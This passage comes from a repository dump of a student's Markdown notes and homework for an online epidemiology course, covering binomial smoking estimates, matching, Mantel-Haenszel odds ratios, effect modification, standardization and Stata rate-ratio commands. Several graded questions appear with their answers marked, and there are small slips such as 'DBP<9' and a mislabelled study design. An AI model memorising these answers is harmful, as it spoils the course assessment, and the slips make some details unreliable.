cancer. You plan to follow this study cohort over a period of 5 years and observe incident cases of lung cancer.\n\n## Smoking and the binomial distribution. \nSmoking status is an important predictor of lung cancer incidence. 
Therefore, as the study designer, it is important to think about baseline smoking rates in your study cohort. We first model the number of smokers in the study cohort using the binomial distribution, and assume that this cohort is a representative sample from the US population. Use the binomial distribution to answer the parts below. \n\n * 2010: 19.3% of >18 years smoke cigarettes\n * 2008: 65.1/100,000 people= 0.000651\n * p= prevalence= 0.193\n * n= sample size= 2000\n * observation: 5 years\n\n##### Q1. How many smokers would you expect to see in the study cohort, on average? #####\n\t \n>\tE(x)= n*p= ? \n\n\tdi 0.193*2000 \n\n>\t=> E(x)= **386**\n\n##### Q2. What is the standard deviation of the number of smokers in the study cohort? #####\n\t \n>\tsd(x)= sqrt(number of people*prevalence*(1-prevalence)) \n>\tsd(x)= SQRT( n*p*(1-p) )= SQRT( 2000*0.193*(1-0.193) ) \n\n>\t=> sd(x)= **17.6494192539**\n\n##### Q3. What is the probability that you observe exactly 386 smokers? #####\n\t \n>\tP(X=386)= binomialp(2000,386,0.193) \n\n\tdi binomialp(2000,386,0.193)\n\n>\t=> P( X = 386 )= **0.0225986**\n\n##### Q4. What is the probability that greater than or equal to 25% of the study population are smokers? Please round your answer to 4 decimal places. #####\n\t \n>\tP( X >= 500 )= binomialtail(2000,500,0.193) \n\n\tdi binomialtail(2000,500,0.193) \n\n>\t=> P( X >= 500 )= **0.0000000002403**\n\n##### Q5. What is the probability that less than or equal to 20% of the study population are smokers? 
#####\n\t \n>\tP( X <= 400 )= binomial(2000,400,0.193) \n\n\tdi binomial(2000,400,0.193) \n\n>\t=> P( X <= 400 )= **0.79487415**\n\n" }, { "alpha_fraction": 0.5526131987571716, "alphanum_fraction": 0.5961150527000427, "avg_line_length": 50.16865158081055, "blob_id": "fa2ee377c26195109138ae5dbbdea7067f0c911e", "content_id": "bce4cdb9c919c74a6f444f67316ce7bdb48fb41d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25792, "license_type": "no_license", "max_line_length": 540, "num_lines": 504, "path": "/PH207x/excercises/Lesson10/Matching and Effect Modification.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Matching and Effect Modification #\n\n## Matching - Intro ##\n\n### Restriction ###\n* **Matching** restricts selection of some subjects to obtain a specified distribution of the matching factor\n* **Observational studies** (e.g. cohort studies): Typically restricts selection of the comparison group\n\t* **Cohort Study**: Non-exposed subjects selected to have similar distribution of as exposed subjects\n\t* **Case Control Study**: Controls selected to have similar distribution of as cases\n\n### Motivation for Matching: Avoid Confounding ###\n* **Matching alone avoids confounding in cohort studies (probided there is a fixed matching ratio)**\n* Matching alone does not necessarily avoid confounding in case-control studies\n\t* Still requires adjustment for the matching factor in the analysis\n\n### DAG with Confounding - Causal Diagram ###\n1. **Confounder -> Exposure**: Target of Matching in Cohort Studies \n-> So what matching does in a cohort study, it addresses the relationship\nbetween the potential confounder.\n2. **Confounder -> Outcome**: Target of Matching in Case Control Studies\n\t* And I said in a cohort study, matching blocks that relationship.\n\t* And it also has been independent risk factor for the outcome.\n3. 
**Exposure -> Outcome**:\n\n#### Why I want to have old people in my study? ####\nThe problem is there are two reasons, as I look at my cases and select their match controls matching by age, there are **two reasons I might see a lot of old people among my cases**. The two reasons are, \n* that if age is my potential confounder, and CHD-- coronary heart disease-- is my outcome, there are two potential mechanisms by which old people could end up being cases in your study.\n\t1. Old age itself influences the risk of having disease, so older people are going to be **more likely** to be your cases.\n\t2. But remember, old age might also be related to whether you smoke or you don't smoke. And smoking brings with it higher risk of getting heart disease.\n\n### Summary: Case Control Studies ###\n* Matching on a confounder in a case control study:\n\t- Builds **similar distributions** of confounder among the cases and controls\n\t- Builds similar distributions of any correlate of the confounder (e.g. exposure) among the cases and controls\n* Implication: Biases crude **odds ratio** towards its null value (1.0)\n\n## How to Perform Matching: Question##\nWhen performing matching in a case-control study:\n* => **Controls are selected to have a similar distribution of the matching factors as the cases.**\n* Non-exposed subjects are selected to have similar distribution of the matching factors as exposed subjects. \n* Cases are selected to represent the exposure distribution in the general population.\n* Controls are selected to have a similar distribution of the exposure as the cases. \n\n## Example of Matching ##\n\n### Example of confounding by sex in a large population ###\n* **A. Sex distribution among exposed and among non-exposed subjects in the source population** \n \n | Exposed | Non-Exposed\n-------- | ----------- | ------------\n Males | 8,000 (80%) | 2,000 (20%)\n Females | 2,000 (20%) | 8,000 (80%)\n Total | 10,000 | 10,000\n\n* **B. 
Exposure and sex-specific risks of outcome** \n \n | Exposed | Non-Exposed\n-------- | ------- | ------------\n Males | 0.06 | 0.02\n Females | 0.03 | 0.01\n\n* **C. Expected number of outcomes** \n \n | Exposed | Non-Exposed | Total\n-------- | ------- | ------------ | ------ \n Males | 480 | 40 | \n Females | 60 | 80 | \n Total | 540 | 120 | 660 Controls \n\nNow, remember a confounder has to have two relationships:\n1. It has to be in balance in the two groups you're comparing.\n2. But it also has to be an independent risk factor or at least a marker or a determinant of developing the disease.\n \n> So right now from these two characteristics, characteristic **A** and characteristic **B** on this slide, we can say that this particular factor of sex **should be a confounder**. It's satisfying the two criteria that confounder has to have.\n \n> **The risk changes from 2% to 6%**. So what's the right answer for the effect of the exposure? The risk ratio here is **3.0**. Regardless whether you're male or female, the exposure triples your risk.\n \n##### DAG with Sex - Causal Diagram #####\n\n1. **Sex -> Exposure**: ***80%***\n2. **Sex -> Disease**: ***Risk Ratio= 2%***\n3. **Exposure -> Disease**:\n\n\n* **D. Expected sex-specific data** \n \n | Males Outcome | | *Total* | Females Outcome | | *Total* \n------------ | ------------- | ----- | --------- | --------------- | ----- | --------- \n | **+** | **-** | | **+** | **-** | \n Exposed | 480 | 7520 | 8000 | 60 | 1940 | 2000 \n Non-Exposed | 40 | 1960 | 2000 | 80 | 7920 | 8000 \n Risk Ratio | | | 3.0 | | | 3.0 \n\n#### Conclusion ####\n* Sex appears to be a confounder\n\t- Associated with the exposure in the source population\n\t- Independent determinant of the outcome\n* RR_Crude=4.5 != RR_Adjusted=3.0\n\n\n### Example Matched (by sex) cohort study ###\n**Matched (by sex) cohort study** based on 1000 exposed subjects selected at random from the source population\n* **A. 
Sex distribution among exposed and among matched non-exposed subjects** \n \n | Exposed | Non-Exposed\n-------- | --------- | ------------\n Males | 800 (80%) | 800 (80%)\n Females | 200 (20%) | 200 (20%)\n Total | 1000 | 1000\n\n* **B. Exposure and sex-specific risks of outcome** \n \n | Exposed | Non-Exposed\n-------- | ------- | ------------\n Males | 0.06 | 0.02\n Females | 0.03 | 0.01\n\n* **C. Expected number of outcomes** \n \n | Exposed | Non-Exposed | Total\n-------- | ------- | ------------ | ------ \n Males | 48 | 16 | \n Females | 6 | 2 | \n Total | 54 | 18 | 72 \n\n* **D. Expected sex-specific data** \n \n | Males Outcome | | *Total* | Females Outcome | | *Total* \n------------ | ------------- | ----- | --------- | --------------- | ----- | --------- \n | **+** | **-** | | **+** | **-** | \n Exposed | 48 | 752 | 800 | 6 | 194 | 200 \n Non-Exposed | 16 | 784 | 800 | 2 | 198 | 200 \n Risk Ratio | | | 3.0 | | | 3.0 \n\n* **E. Expected crude data** \n \n | Outcome | | *Total* \n------------ | ------------- | ----- | --------- \n | **+** | **-** | \n Exposed | 54 | 946 | 1000 \n Non-Exposed | 18 | 982 | 1000 \n Risk Ratio | | | 3.0 \n\n\n#### Conclusion for cohort study ####\n* I no longer have a relationship in my data set between sex and exposure (between sex and smoking). Therefore, **sex should not be a confounder**.\n* RR_Crude=RR_Adjusted=3.0\n* Matching on Sex avoids confounding\n\n\n### Example Matched (by sex) case control study ###\n**Matched (by sex) cohort study** based on all 660 outcome cases that developed from the source population\n* **A. Sex distribution among exposed and among matched controls** \n \n | Cases | Control\n-------- | --------- | ------------\n Males | 520 (79%) | 520 (79%)\n Females | 140 (21%) | 140 (21%)\n Total | 660 | 660\n\n* **B. 
Exposure and sex-specific risks of outcome** \n\t- **Cases (Panel C for source population):** \n \n | Exposed | Non-Exposed | Total\n-------- | --------- | ------------ | ------\n Males | 480 (92%) | 40 (8%) | 520 \n Females | 60 (43%) | 80 (57%) | 140 \n Total | 540 (82%) | 120 (18%) | 660 \n\n\t- **Control (Panel A for source population):** \n \n | Exposed | Non-Exposed | Total\n-------- | --------- | ------------ | ------\n Males | 416 (80%) | 104 (20%) | 520 \n Females | 28 (20%) | 112 (80%) | 140 \n Total | 444 (67%) | 216 (33%) | 660 \n\n* **C. Expected sex-specific data** \n \n | Males Exposure | | *Total* | Females Exposure | | *Total* \n------------ | -------------- | ----- | --------- | ---------------- | ----- | --------- \n | **+** | **-** | | **+** | **-** | \n Exposed | 480 | 40 | 520 | 60 | 80 | 140 \n Non-Exposed | 416 | 104 | 520 | 28 | 112 | 140 \n Odd Ratio | | | 3.0 | | | 3.0 \n\n* **D. Expected crude data** \n \n | Outcome | | *Total* \n------------ | ------------- | ----- | --------- \n | **+** | **-** | \n Exposed | 540 | 120 | 660 \n Non-Exposed | 444 | 216 | 660 \n Odd Ratio | | | 2.2 \n\nOdd Ratio is less than 3.0. It's under estimating the true effect. That's the implications of matching in this case by sex which is a strong correlate of your exposure.\n\n#### Conclusion ####\n* Matching by sex alone did not avoid confounding\n* **Adjusted analysis is still required**\n* Problem: two reasons for high prevalence of male sex among cases\n\t- Sex is a risk factor\n\t- Exposure a risk factor and sex associated with exposure\n\n\n## Matching - Efficiency ##\nIn the last lecture I try to make a distinction of the implications of **matching in a cohort study versus matching a case control study**. 
I said the good news is, matching in a cohort study with equal numbers of non-exposed being matched to each exposed person **avoids confounding**.\n\n#####Q: Why would people want to do a match design when you're doing a case control study?#####\n* Because either way you have to control for the factor. If it's a true confounder and you didn't match on it, you're going to have to control for it the analysis.\n* You get a more efficient analysis. You have more power for when you do your tests of significance, or your confidence intervals will be now narrower when you report your confidence intervals around your odds ratios.\n\n### Matching and Efficiency in Case Control Study ###\n* Not machting on a confounder -> **varying case/control ratios across strata**\n* Matching on a confounder -> **constant case/control ratios across strata**\n* **Matched analysis tends to be more efficient than *stratified analysis* of unmatched data**\n\nAnd I'm going to measure **odds ratios** in each of these tables, and use **Mantel-Haenszel's formula** to get the adjusted value, because I'm assuming **age is a confounder**.\n\n## Results of Matching - Question ##\nMatching in a case-control study:\n* => **A. Results in narrower confidence intervals than would have been obtained if one did not conduct a matched study.**\n* B. Provides an unbiased estimate of the association even without accounting for the matching in the analysis. \n* C. Limits the potential for recall bias. \n* D. Choices A and B\n\n## Matching - Analysis ##\nVideo: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-11_001.mp4 \n \nBasic prinziple: Perform analysis within each matched group and then pool to obtain a summary average \n \nTypical format for results from a case control study involving\n* 1-1 matching on a single factor. 
\n \n | Exposure + | Status of Control - \n--------------- | ----------- | -------------------- \n Exposure | + A | **B** \n Status of Case | **- C** | D \n\nThe information about whether exposure is related to being a case, being a control, is really limited to the matched groups where the case and the control are called **discordant with** respect to exposure. (-C AND B) \n-> So for example, capital **B** were the number of matched groups where the case was a smoker and the control was not, and capital **C** were the number of matched groups where the control was a smoker and the case was not. The relative sizes of B and D are going to tell you whether smokers are more likely to be cases than to be controls.\n\n### Odds Ratio Estimation ###\nAnd in biostatistics, you learn that the way you estimate an odds ratio linking ***exposure to disease*** from case control studies that are matched of the form we were just looking at is you divide the number of matched groups where the ***case is a smoker and the control is not***, capital B. You ***divide*** that ***by capital C***, the number of matched groups where the ***control was a smoker and the case was not***. 
That ratio estimates the odds ratio for developing -- for being a case of disease comparing smokers to nonsmokers.\n\n```math\n\tOR=B/C\n```\n> Identical to the Mantel-Haenszel estimate for the odds ratio with each matched pair as a separate stratum\n\n#### Example: Predictors of Low Birth Weight Babies ####\n* Case Control Study\n* **56 cases** (infants born with low birth weight)\n* **56 controls** matched by **age of the mother**\n* **Exposure: Maternal smoking during pregnancy**\n\n##### Matched Analysis #####\n \n | Exposure + | Status of Control - \n--------------- | ----------- | -------------------- \n Exposure | + 8 | **22** \n Status of Case | **- 8** | 18 \n\n```math\n\tOR=22/8=2.75\n```\n\n##### Stratified Analysis #####\nWe need **8** ***two by two tables*** \n \n###### Now, remember what Mantel-Haenszel's formula does: ######\n**It says, for an odds ratio, take the value, A, and multiply it by the value, D, and divide it by the grand number, T. That goes into the formula in the numerator of the Mantel-Haenszel estimate.** \n \n | Exposure + | Status of Control - \n--------------- | ----------- | -------------------- \n Exposure | + A | **B** \n Status of Case | **- C** | D \n\n**Well, in the first case of the following table:**\n* A is 1, \n* D is 0\n* T is 2\n* ***So it's going to be A*D/T=1*(0)/2***\n \n | Strata D+ | Strata D- | Frequency | AD/T | BC/T | SUM AD/T | SUM BC/T \n---------- | --------- | --------- | --------- | ------- | ------- | ---------- | -------- \n E+ | 1 | 1 | 8 | 0 | 0 | 8*0 | 8*0 \n E- | 0 | 0 | | | | | \n | | | | | | | \n E+ | 1 | 0 | 22 | 1/2 | 0 | 22*1/2 | 22*0 \n E- | 0 | 1 | | | | | \n | | | | | | | \n E+ | 0 | 1 | 8 | 0 | 1/2 | 8*0 | 8*1/2 \n E- | 1 | 0 | | | | | \n | | | | | | | \n E+ | 0 | 0 | 18 | 0 | 0 | 18*0 | 18*0 \n E- | 1 | 1 | | | | | \n | | | | | | | \n **Total** | | | | **1/2** | **1/2** | **22*1/2** |**8*1/2** \n\n```math\n\tOR=(SUM AD/T) / (SUM BC/T)= 22(1/2)/8(1/2)=2.75\n```\n\n### Conclusion ###\nSo the 
important piece to keep in mind is that if you have **matching in a case control study**, once you come to the analysis stage, **you still have to control for the matching factor as if it's still a confounder**. In this case, if you control using stratified analysis, you'll get the same answer you're learning using the formulas in biostatistics for doing matched analysis.\n\n## Effect Modification Example ##\nVideo 1: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-12_100.mp4 \nVideo 2: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-13_100.mp4\n \n**Confounding vs. Effect modification**: These are entirely different concepts of epidemiology. But they're often confused because they both **typically involve stratified analysis**. But they use **stratified analyses in different ways** to answer entirely different questions.\n\n### Effect Modification ###\n* Refers to an **exposure** having a **different** effect on the **outcome** in different groups of patients\n\t- Example: Personlized medicine\n* Detected by comparing stratum-specific estimates of the measure of effect (**sub-group analyses**)\n\nEffect modification means they are different: The effect of a drug, the effect of a treatment, the effect of an exposure is modified by the group of people you are looking at-- in that case, by the age of the people. \n \nThis is what I mean by effect modification, the value that we're giving to describe the effect of an exposure-- in in this case, the effect of a treatment, beta blocking-- differs. It depends on what type of person you are. 
In this case, in terms of a person's risk of having a cardiac complication.\n\n* **Effect Modifier**: Factor whose levels show different effect of the exposure on the outcome\n* Conclusion about Effect Modification is dependent on the chosen measure of effect (**Effect Measure Modification**)\n\n### Detection of Modification ###\n* Difficult\n* Must **distinguish** from other reasons for differences in stratum-specific estimates\n\t- bias\n\t- Confounding by other factors\n\t- Chance variation\n* Need **clinical/biological** argument\n\t- Prior justification to look for Effect Modification\n\n=> **Confidence Interval** gives you a range of values suggested by the data as being reasonable estimates for the odds ratios.\n\n### Ruling Out Chance Variation ###\n* Tests of homogeneity\n\t- Breslow-Day Test compares stratum-specific odd ratio estimates\n\t- Null Hypothesis: No Effect Modification\n\t- Interaction terms in regression models\n* Examine stratum-specific confidence intervals\n* Problem: All influenced by sample size (e.g. have not enough people)\n\n### Presenting Results in the Presence of Effect Modification ###\n* Present stratum-specific results (**best option**) - Most information you can give the reader\n* Calculate weighted-average of stratum specific estimates (e.g. Mantel-Haenszel Estimates)\n\t- Not optimal theoretically\n\t- Single value cannot reflect different effects\n\t- Description of average effect for unspecified population\n* Standardization\n\t- Describes average effect of the exposure **in a standard population**\n\n## Effect Modification - Standardization ##\nDon't pull those (sex, age groups etc.) different numbers into one single average using Mantel-Haenszel's formula. 
But I said there is another option to get one number to describe **the average effect of that risk factor**, that exposure, **that treatment in a specific population**.\n\n### Components of (Direct) Standardization ###\n* Select a **Standard Population**\n* Stratify by confounding factor or effect modifier\n\t- Example: Age categories\n* Calculate confounder specific (age-specific) outcome risks for exposed (smokers) and non-exposed (non-smokers)\n* Estimate average risk in standard population, if \n\t- Everyone was exposed\n\t- Everyone was non-exposed\n\t- Make comparison\n* Estimates counterfactual risks\n\n**It's a way to display the effect of a risk factor when you have effect modification by describing its average effect in a single specified population.** \n\n### Choice of Standard Population ###\n* Internal Population\n\t- Full data set\n\t- Exposed individuals\n\t- Non-Exposed individuals\n* External Population: E.g. USA, every year, publishes mortality rates that are standardized \n* Results describe average effect of the exposure in that standard population\n* Results may change with different standard population\n\n### Standardization and Causal Inference ###\n* If no residual confounding, standardization yields estimates of counterfactual outcomes\n* Standardization involves two weighted analyses (**Inverse Probability Weighting**):\n\t- For each age group, exposed individuals reweighted to represent standard population\n\t- For each age group, non-exposed individuals reweighted to represent standard population\n\n**So standardization is linked to this notion of counterfactuals, linked to this notion of causal inference.**\n\n\n## Matching - Example # 2 ##\nVideo 1: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-14_100.mp4 \nVideo 2: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-15_100.mp4 \nVideo 3: 
https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-16_100.mp4 \nMatching is based on stratification and gives you an answer to two questions:\n* What would happen in the standard population if everyone was given the exposure \n* What would happen in this population if no one was given the exposure\n\n### Example: Age-Standardized Risks of Death among Smokers and Non-Smokers in the Framingham Heart Study ###\n\n#### Components of Standardization ####\n* Standard Population: **4434 individuals** attending 1956 exam of the Framingham Heart Study\n* Stratify by confounding factor (agecat)\n* Calculate confounding-specific **outcome risks** for exposed (**smokers**) and non-exposed (**non-smokers**)\n* Estimate average risk in standard population, if\n\t- Everyone was exposed\n\t- Everyone was non-exposed\n\n#### Data ####\n\n Age <= 40 | Died | Survived | Total\n------------ | --- | -------- | ------\n Smokers | 67 | 385 | 452 \n Non-Smokers | 25 | 277 | 302 \n Total | 92 | 662 | **754** \n\n* Estimated Risk (cumulative incidence)= Risk of dying if you're young= 67/452= 0.14823009\n* Estimated risk of dying (cumulative incidence of death) among young nonsmokers= 25/302= 0.08278146\n\n\n 40 < Age <= 50 | Died | Survived | Total\n----------------- | --- | -------- | ------\n Smokers | 266 | 689 | 955 \n Non-Smokers | 110 | 574 | 684 \n Total | 376 | 1263 | **1639** \n\n 50 < Age <= 60 | Died | Survived | Total\n----------------- | --- | -------- | ------\n Smokers | 286 | 281 | 567 \n Non-Smokers | 312 | 500 | 812 \n Total | 598 | 781 | **1379** \n\n Age > 60 | Died | Survived | Total\n------------ | ---- | -------- | ------\n Smokers | 169 | 38 | 207 \n Non-Smokers | 315 | 140 | 455 \n Total | 484 | 178 | **662** \n\n### Questions ###\n* What is the estimated # Deaths of everyone smoked?\n* What is the estimated # Deaths if no one smoked?\n\n#### Standardization ####\nThere are 4434 individuals to calculate Expected # of Deaths:\n1. 
Fill Out Expected # Deaths for Smokers\n2. Expected # of Deaths for Non-Smokers\n\n Standard Population (Age Group) | Number | Risk if all were Exposed (Smoker) | Expected # of Deaths | Risk if all Non-Exposed (Non-Smoker) | Expected # of Deaths \n-------------------------------- | -------- | --------------------------------- | -------------------- | ------------------------------------ | ----------------------\n <= 40 | 754 | 67/452 = 0.1482 | 754*0.1482 = 111.74 | 25/302 = 0.0828 | 754*0.0828 = 62.43 \n (40, 50] | 1639 | 266/955 = 0.2785 | 1639*0.2785 = 456.46 | 110/684 = 0.1608 | 1639*.1608 = 263.55 \n (50, 60] | 1379 | 286/567 = 0.5044 | 1379*0.5044 = 695.57 | 312/812 = 0.3842 | 1379*0.3842 = 529.81 \n > 60 | 662 | 169/207 = 0.8164 | 662*0.8164 = 540.46 | 315/455 = 0.6923 | 662*0.6923 = 458.30 \n **Total** | **4434** | | **1804.23** | | **1314.09** \n\n##### Standardized Risks #####\n* Smokers: 1804.23/4434=0.4069\n* Non-Smokers: 1314.09/4434= 0.2964\n* Standardized Risk Ratio: 0.4069/0.2964= 1.37\n\n##### Standardization and Inverse Probability Weighting (IPW) #####\nExample: Standardized Risk for Smokers: Expected # of death in youngest age group: **111.74** \n\n```math\n111.74 = (smokers risk) x (size of standard population) \n = (67/452) x (754) \n = (67/452) x (452) x (754/452) \n = (67/452) x [ (452) x (weight) ] \n```\n\nYoung Smokers in data are being re-weighted to represent young part of standard population and to determine expected outcome in standard population \n\n```math\nweight = 754/452 = 1/P(Smoking|Age <= 40) \n = 1/P(Exposure|Age <= 40) \n = 1/P(Exposure|Confounder) \n = 1/Propensity Score \n```\n\n###### Alternative: Propensity Scores ######\nSimilarly for Non-Smoker Standard Population: Young non-smokers in data are weighted by\n\n```math\nweight = 1/P(Non-Smoker|Young in data)\n = 1/(1-Propensity Score)\n```\n\n### Conclusion ###\n* Standardization provides estimates of counterfactual outcomes\n\t- # Deaths if everyone smoked\n\t- # Deaths 
is no one smoked\n* Estimates **causal effect** of smoking if there are no other confounders\n* Standardization **re-weights** data by functions of the Propensity Score\n\n\n## Effect Modification - Confounding vs. Effect Modification ##\nVideo: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-17_100.mp4\n* Independent concepts\n\t- Confounding: Problem that must be corrected; In other words **confounding is a problem**\n\t- Effect Modification: Truth\n* Both can be detected via stratification\n* Involve different comparisons\n\n## Effect Measure Modifier: Question ##\nIf a factor confounds the association between exposure and outcome, it cannot be an effect measure modifier.\n* True\n* => **False**\n\n\n\n" }, { "alpha_fraction": 0.7165729403495789, "alphanum_fraction": 0.7416702508926392, "avg_line_length": 56.75, "blob_id": "f4b4915a2ffff81e7f7981512c36ea285a64ae58", "content_id": "9e22a9354820ab72f90d5215ff9cb3cf0fa6366f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2319, "license_type": "no_license", "max_line_length": 376, "num_lines": 40, "path": "/PH207x/homework/ten/High Blood Pressure and CHD Incidence.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# High Blood Pressure and CHD Incidence #\nUse Stata and the NHLBI data set to create the two categories of high blood pressure (highbp1) \n\n```stata\n\tgenerate highbp1=.\n\treplace highbp1=1 if (sysbp1>=140 | diabp1 >= 90)\n\treplace highbp1=0 if (sysbp1<140 & diabp1<90)\n```\n\n**(Note: There are no missing data on sysbp1 and diabp1. If data were missing on both sysbp1 and diabp1 then it should also be missing for highbp1. If data were missing on diabp1 only and sysbp1 >= 140 then highbp1 =1, otherwise highbp1 should be missing. Similarly, if data were missing on sysbp1 only and diabp1 >= 90 then highbp1 =1, otherwise highbp1 should be missing.)**\n\n##### 1. 
What is the incidence rate ratio of stroke comparing those with high blood pressure to those without high blood pressure? Hint: The variable for stroke in the dataset is “stroke” and the number of years a person was followed for stroke is recorded in the “timestrk” variable. #####\n> **Hint1:** Just a hint (I had this problem) - make sure you put data for the right sex in the right field (somehow I was putting results for males into Q3 and females into Q2 :))\n\n```stata\n\tir stroke highbp1 timestrk\n```\n\n##### 2. What is the incidence rate ratio (rounded to two decimal points) for the association between high blood pressure (highbp1) and the rate of stroke among men? Hint: Use the variable (sex1). #####\n\n```stata\n\tir stroke highbp1 timestrk, by(sex1)\n```\n\n##### 3. What is the incidence rate ratio (rounded to two decimal points) for the association between high blood pressure (highbp1) and the rate of stroke among women? #####\n\n```stata\n\tir stroke highbp1 timestrk, by(sex1)\n```\n\n##### 4. Conduct a test of homogeneity to evaluate whether the association between high blood pressure (highbp1) and the rate of stroke is different by sex. Based on this test, is there evidence that the difference between the sex-specific incidence rate ratios are more than just random sampling variability? #####\n* Yes\n* No\n\n##### 5. Based on these results, what are the options for properly reporting the association between high blood pressure (highbp1) and the rate of stroke? #####\n* A. Sex-specific incidence rate ratios \n* B. Pooled (Mantel-Haenszel) incidence rate ratio \n* C. Standardized incidence rate ratio \n* D. Choices A or B \n* E. 
Choices A or C \n" }, { "alpha_fraction": 0.7306461930274963, "alphanum_fraction": 0.740243136882782, "avg_line_length": 38.04999923706055, "blob_id": "eb1d7df5936e8659d711f3373e6c2183ebd33968", "content_id": "dfca33242f738728728d570ddca06e2c6fb08c8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1563, "license_type": "no_license", "max_line_length": 256, "num_lines": 40, "path": "/PH207x/homework/ten/More Regression.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# More Regression #\n\n``stata\n\tregress nickel vanadium\n\ttwoway (scatter nickel vanadium)\n```\n\n##### 1. Examine the relationship between vanadium (another marker of oil in sediment) and nickel using a scatter plot. Does this relationship appear linear? #####\n* Yes\n* No \n\n##### 2. How many outliers do you observe in this scatterplot? #####\nAs the investigator, it is important to determine the true cause of any observed outliers. If these are a result of error they should be removed, however outliers may also be indicators of a real but unusual occurrence that warrants further investigation. \n\n##### 3. How much does nickel increase, on average, for a one mg/kg increase in vanadium? #####\nFit a linear regression model with nickel as the outcome and vanadium as the explanatory covariate (Model 4). Use this model to answer questions 3 and 4.\n\n```stata\n\tregress nickel vanadium\n```\n\n##### 4. How much does nickel increase, on average, for a 10 mg/kg increase in vanadium? #####\n\n```stata\n\tregress nickel vanadium\n```\n\n##### 5. In Models 1 and 2 we saw that nickel levels seemed to increase each month. Does adding month to the model with vanadium as an explanatory covariate substantially improve the fit? #####\n\n```stata\n\tregress nickel vanadium\n\tregress nickel month vanadium\n```\n\n##### 6. Think about the results from the various models. 
Compare the adjusted R-squared for Model 2 with that from Model 5. Does it appear that vanadium is a stronger predictor of nickel levels than month? #####\n\n```stata\n\tregress nickel month\n\tregress nickel vanadium\n```\n\n" }, { "alpha_fraction": 0.8392857313156128, "alphanum_fraction": 0.8392857313156128, "avg_line_length": 17.66666603088379, "blob_id": "37cf9d544cd204d809b57a3bf6a9279759360600", "content_id": "63f30adab27a78cf332fc84ea5f1e2a6f1598808", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/README.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Machine-Learning\nMy Collection\nDecision Tree Learning\n" }, { "alpha_fraction": 0.48162275552749634, "alphanum_fraction": 0.5828710198402405, "avg_line_length": 61.673912048339844, "blob_id": "66d34b6ff097de5adb0ed160ab3df1693de821bc", "content_id": "a1dfa295a769a751bb92649d92b8d442c4761197", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2884, "license_type": "no_license", "max_line_length": 548, "num_lines": 46, "path": "/PH207x/homework/four/Incidence Rate Ratio Blood Pressure and CHD.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Incidence Rate Ratio Blood Pressure and CHD\nThe following table uses data from the NHLBI teaching data set and displays the blood pressure distribution for 4,434 participants in the Framingham Heart Study attending an examination in 1956.\n\nFor each blood pressure category, the table displays the number of subjects with existing Coronary Heart Disease (CHD) at that exam (Prevalent Cases of CHD). It also shows, for those subjects who did not have CHD at the 1956 exam, the number of new cases of CHD during a 24 year follow-up period and the total amount of person-years of follow-up. 
Follow-up for each subject began in 1956 and ended with the development CHD (fatal or non-fatal), death from another cause, loss to follow-up, or the end of the follow-up period (whichever came first).\n\n## Blood Pressure and CHD\n> Group | Blood Pressure Category | # of subjects | Prevalent cases of CHD | # developing CHD during follow-up | Total Years of follow-up\n> ------------- | -------------------------- | ------------- | ---------------------- | --------------------------------- | -------------------------\n> I | SBP<140 and DBP<9 | 2815 | 88 | 547 | 55384.42\n> II | 140<=SBP<160 or 90<=DBP<95 | 781 | 39 | 214 | 13191.79\n> III | 160<=SBP or 95<=DBP | 838 | 67 | 285 | 12348.94\n\n##### Q1. What is the Incidence Rate Ratio for developing CHD for participants in Blood Pressure Groups II or III combined (exposed group) compared to participants in the Blood Pressure Group I (non-exposed group)? #####\n\n=> Rate Ratio= ?\n\n> Group | Incidence Rate\n> ------------- | -------------\n> II or III | (214+285)/(12348.94+13191.79)= 0.0195374212\n> I | 547/55384.42=0.00987642\n\nRate Ratio: RR= 0.0195374212 / 0.00987642= **1.978187828**\n\n\n##### Q2. What is the Incidence Rate Ratio for developing CHD for participants in Blood Pressure Group III (exposed group) compared to participants in the Blood Pressure Group I (non-exposed group)? #####\n\n=> Incidence Rate Ratio= ?\n\n> Group | Incidence Rate\n> ------------- | -------------\n> III | 285/12348.94=0.0230789\n> I | 547/55384.42=0.00987642\n\nRate Ratio: RR= 0.0230789 / 0.00987642= **2.3367678**\n\n\n##### Q3. What is the Incidence Rate Ratio for developing CHD for participants in Blood Pressure Group II (exposed group) compared to participants in the Blood Pressure Group I (non-exposed group)? 
